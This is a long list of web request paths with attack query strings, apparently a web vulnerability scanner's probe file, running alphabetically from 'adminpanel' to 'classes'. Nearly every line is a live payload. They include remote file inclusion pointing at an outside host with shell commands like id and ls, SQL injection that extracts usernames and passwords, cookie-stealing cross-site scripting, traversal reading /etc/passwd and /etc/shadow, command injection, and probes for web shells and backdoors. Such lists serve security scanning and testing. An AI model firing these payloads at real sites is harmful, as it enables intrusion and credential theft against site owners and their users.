adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http://www.yxlink.com/nvs_test.txt?
adodb/adodb-errorpear.inc.php?ourlinux_root_path=http://www.yxlink.com/nvs_test.txt
adodb/adodb-pear.inc.php?ourlinux_root_path=http://www.yxlink.com/nvs_test.txt
adodb/adodb.inc.php?path=http://www.yxlink.com/nvs_test.txt
adovbs.inc
adv_cat.php?cat_id=4\x22><script>alert(2222)</script>&razd_id=45\x22><script>alert(2222)</script>
advanced_comment_system/admin.php?ACS_path=http://www.yxlink.com/nvs_test.txt?
advanced_comment_system/index.php?ACS_path=http://www.yxlink.com/nvs_test.txt?
advanced_search_result.php?keywords=/>\x22<script>alert(15)</script>&x=1&y=1
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.yxlink.com/nvs_test.txt
affich.php?image=<script>alert(document.cookie)</script>
agenda.php3?rootagenda=http://www.yxlink.com/nvs_test.txt
agenda2.php3?rootagenda=http://www.yxlink.com/nvs_test.txt
aguai.php
aguai1.php
aguai123.php
aides/index.php?page=http://www.yxlink.com/nvs_test.txt?
ains_main.php?ains_path=http://www.yxlink.com/nvs_test.txt
ajax.php?act=check_field&field_name=user_name&field_data='and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
ajax.php?rs=__exp__getFeedContent&amp;rsargs[]=-99 UNION SELECT concat(char(58),md5(333),char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/*
ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a,md5(333),0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23
ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/boot.ini
ajax/loadsplash.php?full_path=http://www.yxlink.com/nvs_test.txt
ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>
ajouter.php?include=http://www.yxlink.com/nvs_test.txt?
akarru.gui/main_content.php?bm_content=http://www.yxlink.com/nvs_test.txt
akocomments.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
albumdetail.php?albumid=-31+union/**/select/**/1,md5(333),3,4,5,6,7,8,9,10,11,12,13,14,user(),16--
albums.php?action=editimage&image=[Vaild_ID]&album=2'
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
amazon/cart.php?cmd=add&asin=http://www.yxlink.com/nvs_test.txt
amazon/index.php?lang=http://www.yxlink.com/nvs_test.txt
amazon/info.php?asin=http://www.yxlink.com/nvs_test.txt
ampache/docs/README
ampache/login.php
ampache/update.php
annonce.php?page=http://www.yxlink.com/nvs_test.txt
annonce.php?page=http://www.yxlink.com/nvs_test.txt?&cmd=id
announcements.php?phpraid_dir=http://www.yxlink.com/nvs_test.txt
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
anzagien.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?cmd=id
apbn/templates/head.php?APB_SETTINGS[template_path]=http://www.yxlink.com/nvs_test.txt
api.php?action=File&ctrl=download&path=config.php
api.php?api_script=http://www.yxlink.com/nvs_test.txt
api.php?c=api&f=phpok&id=_project&param[pid]=1/**/UNION/**/SELECT/**/1,concat(md5(333),0x7e,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
api.php?op=add_favorite&url=wooyun.in&title=%2527
api.php?op=get_linkage&act=ajax_getlist&callback=<body onload=alert(1)>
api.php?op=get_menu&act=ajax_getlist&callback=Yxlink&parentid=0&key=authkey&cachefile=..%5C..%5C..%5Cphpsso_server%5Ccaches%5Ccaches_admin%5Ccaches_data%5Capplist&path=admin
api.php?t_path_core=http://www.yxlink.com/nvs_test.txt?&cmd=id
api/call.php?action=query&num=j8g'%29/**/union/**/select/**/1,2,3,concat(0x7e,0x27,username,0x7e,0x4E56535F544553547E,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23
api/trade/notify_credit.php?attach=tenpay&retcode=0&mch_vno=%2527
app/Default.aspx%20
application.php?base_path=http://www.yxlink.com/nvs_test.txt
applications/applications.jsf?');};alert(222);</script><!--
apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15
apps/apps.php?app=http://www.yxlink.com/nvs_test.txt
apps/groups/index.php?route=groups&basePath=http://www.yxlink.com/nvs_test.txt
apps/groups/index.php?route=groups&basePath=http://www.yxlink.com/nvs_test.txt%00
apps/share/index.php?route=groups&basePath==http://www.yxlink.com/nvs_test.txt
apps/share/index.php?route=groups&basePath==http://www.yxlink.com/nvs_test.txt%00
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
appserv/main.php?appserv_root=http://www.yxlink.com/nvs_test.txt
aq.php
arab3upload/customize.php?path=http://www.yxlink.com/nvs_test.txt?&cmd=pwd
arab3upload/initialize.php?path=http://www.yxlink.com/nvs_test.txt?&cmd=pwd
arash_lib/class/arash_gadmin.class.php?arashlib_dir=http://www.yxlink.com/nvs_test.txt
arash_lib/class/arash_sadmin.class.php?arashlib_dir=http://www.yxlink.com/nvs_test.txt
arash_lib/include/edit.inc.php?arashlib_dir=http://www.yxlink.com/nvs_test.txt
arash_lib/include/list_features.inc.php?arashlib_dir=http://www.yxlink.com/nvs_test.txt
archive.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://www.yxlink.com/nvs_test.txt%00
article.cfm?id=1'<script>alert(document.cookie);</script>
article.php?act=list&catid=0&keyword=1%d5'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,hex(323232323232323232),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
article.php?article=4965&post=1111111111
article.php?sid=\x5C\x22><Img Src=javascript:alert('Vulnerable')><Img Src=\x5C\x22
article/file/cid/1136/?file=../../../../application/config/config.ini.php
article_js.asp?OrderField=Hits%20UNION%20SELECT%201,2,3,4,88888888-1,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20admin%20order%20by%201
artlist.php?root_path=http://www.yxlink.com/nvs_test.txt
ashnews.php?pathtoashnews=http://www.yxlink.com/nvs_test.txt
ask/search.aspx?type=%27%20and%201=str(123.4,8,4)%20and%201=%271&word=
asp.php
asp/SQLQHit.asp
asp/sqlqhit.asp
aspx.php
aspxspy.php
assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://www.yxlink.com/nvs_test.txt
assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://www.yxlink.com/nvs_test.txt?cmd
assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.yxlink.com/nvs_test.txt?
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
athena.php?athena_dir=http://www.yxlink.com/nvs_test.txt
athenareg.php?pass=%20;cat%20/etc/passwd
auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
auction/auction_common.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
auction/includes/converter.inc.php?include_path=http://www.yxlink.com/nvs_test.txt?
auction/includes/messages.inc.php?include_path=http://www.yxlink.com/nvs_test.txt?
auction/includes/settings.inc.php?include_path=http://www.yxlink.com/nvs_test.txt?
auction/phpAdsNew/view.inc.php?phpAds_path=http://www.yxlink.com/nvs_test.txt
audit-policy.jsp?maxTotalSize=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&update=Save%20Settings
auth.cookie.inc.php?da_path=http://www.yxlink.com/nvs_test.txt
auth.header.inc.php?da_path=http://www.yxlink.com/nvs_test.txt
auth.sessions.inc.php?da_path=http://www.yxlink.com/nvs_test.txt
auth/auth.php?phpbb_root_path=@RFIUR
auth/auth.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
auth/auth.php?smf_root_path=http://www.yxlink.com/nvs_test.txt
auth/auth_SMF/smf_root_path=http://www.yxlink.com/nvs_test.txt
auth/auth_phpbb/phpbb_root_path=http://www.yxlink.com/nvs_test.txt
authenticate.php?default_path_for_themes=http://www.yxlink.com/nvs_test.txt
authenticate.php?default_path_for_themes=http://www.yxlink.com/nvs_test.txt?
authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.yxlink.com/nvs_test.txt
authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.yxlink.com/nvs_test.txt
auto_check_renewals.php?installed_config_file=http://www.yxlink.com/nvs_test.txt?cmd=ls
autogetarticle/_GetLockPic.php?p=/etc/passwd
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
autoindex.php?cfg_file=http://www.yxlink.com/nvs_test.txt?
awstats.pl
awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)//
awstats/awstats.pl
awzmb/adminhelp.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/admin.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/help.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
awzmb/modules/reg.incl.php?Setting[OPT_includepath]=http://www.yxlink.com/nvs_test.txt
axoverzicht.cgi?maand=http://www.yxlink.com/nvs_test.txt
b.php
b2-include/b2edit.showposts.php?b2inc=http://www.yxlink.com/nvs_test.txt&cmd=ls
b2-tools/gm-2-b2.php?b2inc= http://www.yxlink.com/nvs_test.txt
b2-tools/gm-2-b2.php?b2inc=http://www.yxlink.com/nvs_test.txt
b2verifauth.php?index=http://www.yxlink.com/nvs_test.txt?
backdoor v1.0.php
backend/addons/links/index.php?PATH=http://www.yxlink.com/nvs_test.txt
backup/
baike/style/default/admin/open.gif
bak/
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
basebuilder/src/main.inc.php?mj_config[src_path]=http://www.yxlink.com/nvs_test.txt???
batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,md5(333),0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
bb000001.pl<script>alert('Vulnerable')</script>
bb_admin.php?includeFooter=http://www.yxlink.com/nvs_test.txt
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28md5(333),0x27,md5(444)%29%20from%20information_schema.SCHEMATA%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
bc4j.html
beacon/language/1/splash.lang.php?languagePath=http://www.yxlink.com/nvs_test.txt
belegungsplan/jahresuebersicht.inc.php?root=http://www.yxlink.com/nvs_test.txt
belegungsplan/monatsuebersicht.inc.php?root=http://www.yxlink.com/nvs_test.txt
belegungsplan/tagesuebersicht.inc.php?root=http://www.yxlink.com/nvs_test.txt
belegungsplan/wochenuebersicht.inc.php?root=http://www.yxlink.com/nvs_test.txt
bemarket/postscript/postscript.php?p_mode=http://www.yxlink.com/nvs_test.txt
benjurry.jsp%81
betsie/parserl.pl/<script>alert('Vulnerable')</script>;
biblioteca/bib_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_pldetails.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_plform.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_plsearchc.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_plsearchs.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_searchc.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/bib_searchs.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/edi_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/edi_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/gen_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/gen_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/lin_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/lin_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/luo_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/luo_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/sog_form.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
biblioteca/sog_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://www.yxlink.com/nvs_test.txt
bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=http://www.yxlink.com/nvs_test.txt?
bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=http://www.yxlink.com/nvs_test.txt?
bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.yxlink.com/nvs_test.txt?
bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://www.yxlink.com/nvs_test.txt?
bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
bigdump.php?start=\x22><script>alert(333)</script>
bild.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
billing/billing.apw
bin/qte_init.php?qte_root=http://www.yxlink.com/nvs_test.txt?
bingoserver.php3?response_dir=http://www.yxlink.com/nvs_test.txt
black.php
blah-whatever-badfile.jsp
blah-whatever.jsp
blah123.php
block.php?Include=http://www.yxlink.com/nvs_test.txt
blocks/birthday.php?full_path=http://www.yxlink.com/nvs_test.txt
blocks/events.php?full_path=http://www.yxlink.com/nvs_test.txt
blocks/help.php?full_path=http://www.yxlink.com/nvs_test.txt
blog/mt-check.cgi
blog/mt.cfg
blogcms/admin/media.php?DIR_LIBS=http://www.yxlink.com/nvs_test.txt?
blogcms/admin/xmlrpc/server.php?DIR_LIBS=http://www.yxlink.com/nvs_test.txt?
blogcms/index.php?DIR_PLUGINS=http://www.yxlink.com/nvs_test.txt?
bmzh.php
board.php?FID=2%27
board/post.php?qb_path=http://www.yxlink.com/nvs_test.txt
boardhelp.asp?boardid=0&act=2&title=\x22><script>alert(333)</script>
boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,md5(333),0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/
boitenews4/index.php?url_index=http://www.yxlink.com/nvs_test.txt?
bom.php
book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
book/index.php?c=search&catid=(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
books/allbooks.php?home=http://www.yxlink.com/nvs_test.txt
books/home.php?home=http://www.yxlink.com/nvs_test.txt
books/mybooks.php?home=http://www.yxlink.com/nvs_test.txt
bottom.html
bp_ncom.php?bnrep=http://www.yxlink.com/nvs_test.txt
bp_news.php?bnrep=http://www.yxlink.com/nvs_test.txt
bridge/enigma/E2_header.inc.php?boarddir=http://www.yxlink.com/nvs_test.txt?
bridge/yabbse.inc.php?sourcedir=http://www.yxlink.com/nvs_test.txt
bridges/SMF/logout.php?path_to_smf=http://www.yxlink.com/nvs_test.txt
browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(md5(333),0x3a,admin_password),2,3+from+se_admins
bu/bu_cache.php?bu_dir=http://www.yxlink.com/nvs_test.txt?
bu/bu_claro.php?bu_dir=http://www.yxlink.com/nvs_test.txt?
bu/bu_parse.php?bu_dir=http://www.yxlink.com/nvs_test.txt?
bu/process.php?bu_dir=http://www.yxlink.com/nvs_test.txt?
buddy.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
bugs/bug.php?op=viewvotes&bugid=1 union select 1,md5(333),3 \x5C where user_id='2'/*
bugs/forgot_password.php?email=\x5C\x22><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\x5C\x22><script>alert(document.cookie)</script>
builddb.php?env_dir=http://www.yxlink.com/nvs_test.txt
button/settings_sql.php?path=http://www.yxlink.com/nvs_test.txt
c.php
c/winnt/system32/cmd.exe?/c+dir+/OG
ca000001.pl?ACTION=SHOWCART&hop=\x5C\x22><script>alert('Vulnerable')</script>&PATH=acatalog%2f
ca000007.pl?ACTION=SHOWCART&REFPAGE=\x5C\x22><script>alert('Vulnerable')</script>
cacti/graph.php?local_graph_id=1&rra_id=34&action=properties&view_type=token'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://www.yxlink.com/nvs_test.txt?
cal.func.php?dir_edge_lang=http://www.yxlink.com/nvs_test.txt
calcul-page.php?home=http://www.yxlink.com/nvs_test.txt
calendar.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt> \x5Cr\x5Cnhttp://127.0.0.1/upload/faq.php?a
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
calendar.php?cfg_dir=http://www.yxlink.com/nvs_test.txt?
calendar.php?lang=http://www.yxlink.com/nvs_test.txt
calendar.php?path_to_calendar=http://www.yxlink.com/nvs_test.txt
calendar.php?vwar_root=http://www.yxlink.com/nvs_test.txt
calendar.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
calendar/demo/index.php?date=&v=http://www.yxlink.com/nvs_test.txt?
calendar/payment.php?insPath=http://www.yxlink.com/nvs_test.txt
calendar_admin.pl?config=|cat%20/etc/passwd|
calendario/cal_insert.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
calendario/cal_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
calendario/cal_saveactivity.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
campas?%0acat%0a/etc/passwd%0a
caoc.php
career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/%201,md5(333),3,4%20--
cart.aspx?act=spikebuy&spikeid=3%20and%20str(123.4,8,4)%3E0
cart.php?lang_list=http://www.yxlink.com/nvs_test.txt
cart.pl?db='
cartWiz/store/addToCart.asp?idProduct='&quantity=1
cartWiz/store/error.asp?message='\x22><script>alert(1111)</script>
cart_content.php?cart_isp_root=http://www.yxlink.com/nvs_test.txt
cartwiz/store/access.asp?redirect='\x22><script>alert(1111)</script>
cartwiz/store/addToWishlist.asp?idProduct='\x22><script>alert(111111)</script>
cartwiz/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='\x22>/cartwiz/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='\x22><script>alert(11111)</script>
cartwiz/store/productCatalogSubCats.asp?idParentCategory='
cartwiz/store/productDetails.asp?idProduct='
cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom='&priceTo=9999999999&validate=1
cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo='&validate=1
cartwiz/store/searchResults.asp?name=&idCategory='&sku=&priceFrom=0&priceTo=9999999999&validate=1
cartwiz/store/searchResults.asp?name='\x22><script>alert(1111)</script>&idCategory=&sku=&priceFrom=0&priceTo=9999999999&validate=1
cartwiz/store/tellAFriend.asp?idProduct='\x22><script>alert(1111)</script>
catalog/includes/include_once.php?include_file=http://www.yxlink.com/nvs_test.txt
catalogg/inludes/include_once.php?include_file=http://www.yxlink.com/nvs_test.txt
catalogshop.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
categorie.php3?cid=june
catinfo.asp?cat='union%20select%20null,null,md5(333),null,null,null,null,null,pass,null,null,null,null,null%20FROM%20tblAdm%20where%20'1'='1
catinfo?<u><b>TESTING
cdsagenda/modification/SendAlertEmail.php?AGE=http://www.yxlink.com/nvs_test.txt?
celive/js/include.php?cmseasylive=1111&departmentid=0%27and%20%271%27=%271
celive/js/include.php?cmseasylive=1111&departmentid=0%27and%20%271%27=%272
centre.php?page=http://www.yxlink.com/nvs_test.txt
certificate.php?host='\x22><script>alert(111)</script><\x22
certificate.php?host='\x22><script>alert(111)</script><\x22abxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeada.php?a=<script>alert(32233333)</script>
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
ceshi.php
cfagcms/themes/default/index.php?main=http://www.yxlink.com/nvs_test.txt
cfcache.map
cfdocs.map
cfdocs/cfcache.map
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\x5Cboot.ini
cfdocs/exampleapp/email/getfile.cfm?filename=c:\x5Cboot.ini
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\x5Cboot.ini
cfide/administrator/index.cfm
cgi-bin-sdb/printenv
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert %28%27XSS%27%29%3B%3C/script%3E
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
cgi-bin/cgix/help?&page=web_list_block?\x22<script >alert(333)</script>
cgi-bin/eshop.pl?seite=;id|
cgi-bin/forms.exe?extension=foobar&command=Add+Extension
cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download
cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
cgi-bin/main_menu.pl
cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``  \x5Cr\x5Cncat%20/etc/shadow`&port=80&e
cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd
cgi-bin/psinclude.cgi?template=|id%20-a;uptime|
cgi-bin/search
cgi-bin/smallmenu.pl?url=%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E
cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|
cgi-bin/test-cgi
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/testing_whatever
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD
cgi-bin/webcgi/about
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-sys/guestbook.cgi?user=cpanel&template=|id
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\x5Cwindows\x5Cwin.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\x5Cwinnt\x5Cwin.ini
cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname=\x22<script>alert('XSS');</script>
cgicso?query=<script>alert('Vulnerable')</script>
cgicso?query=AAA
cgiwrap/%3Cfont%20color=red%3E
cgiwrap/~@USERS
cgiwrap/~JUNK(5)
cgiwrap/~root
ch_readalso.php?read_xml_include=http://www.yxlink.com/nvs_test.txt
challenge.php?vwar_root=http://www.yxlink.com/nvs_test.txt
challenge.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
change_preferences2.php?target=http://www.yxlink.com/nvs_test.txt
change_preferences2.php?target=http://www.yxlink.com/nvs_test.txt?
chart.php?art=http://www.yxlink.com/nvs_test.txt
chassis/config/GeneralChassisConfig.html
chat.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
chat.php?my[root]=http://www.yxlink.com/nvs_test.txt?cm=id
chat.php?rg=0&test=\x22;phpinfo();exit;//
chat/adminips.php?banned_file=http://www.yxlink.com/nvs_test.txt
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>&email1=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>
chat/users_popupL.php3?From=http://www.yxlink.com/nvs_test.txt
checkout.php?abs_path=http://www.yxlink.com/nvs_test.txt
chimera/linkcategory.php?id=9999'%20union%20select%20md5(333)%20from%20admin/*
chkadmin/
chklogin/
ciamos_path/modules/forum/include/config.php?module_cache_path='http://www.yxlink.com/nvs_test.txt'
circ.php?include_path=http://www.yxlink.com/nvs_test.txt?
circolari/cir_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
citywriter/head.php?path=http://www.yxlink.com/nvs_test.txt?
cl_files/index.php?path_to_calendar=http://www.yxlink.com/nvs_test.txt?
claroline/auth/ldap/authldap.php?includePath=http://www.yxlink.com/nvs_test.txt
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(222)%3C/script%3E
claroline/phpbb/page_tail.php?includePath=http://www.yxlink.com/nvs_test.txt
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,0,md5(333),0,0,0%20from%20user%20where%20user_id=1--
claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20md5(333),0,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline180rc1/claroline/inc/lib/import.lib.php?includePath=http://www.yxlink.com/nvs_test.txt?
class.mysql.php?path_to_bt_dir=http://www.yxlink.com/nvs_test.txt
class/Wiki/Wiki.php?c_node[class_path]=http://www.yxlink.com/nvs_test.txt
class/jpcache/jpcache.php?_PSL[classdir]=http://www.yxlink.com/nvs_test.txt?exec=uname
class/mysql.class
class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/Message.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
